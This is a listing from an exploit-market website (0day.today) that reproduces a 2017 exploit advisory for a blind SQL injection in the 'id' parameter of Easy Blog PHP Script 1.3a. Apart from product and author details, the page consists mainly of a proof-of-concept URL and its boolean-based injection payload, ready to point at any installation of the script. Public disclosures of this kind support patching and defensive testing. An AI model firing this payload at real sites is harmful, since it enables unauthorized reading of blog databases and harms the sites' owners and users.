[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easy Blog PHP Script 1.3a - id Parameter SQL Injection Vulnerability

Author
8bitsec
Risk
[
Security Risk High
]
0day-ID
0day-ID-28669
Category
web applications
Date add
28-09-2017
Platform
php
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
# Date: 2017-09-27
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
# Version: 1.3a
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
 
Release Date:
=============
2017-09-27
 
Product & Service Introduction:
===============================
A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
 
Technical Details & Description:
================================
 
SQL injection on [id] parameter.
 
Proof of Concept (PoC):
=======================
 
SQLi:
 
http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
 
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
 
==================
8bitsec - [https://twitter.com/_8bitsec]

#  0day.today [2024-11-16]  #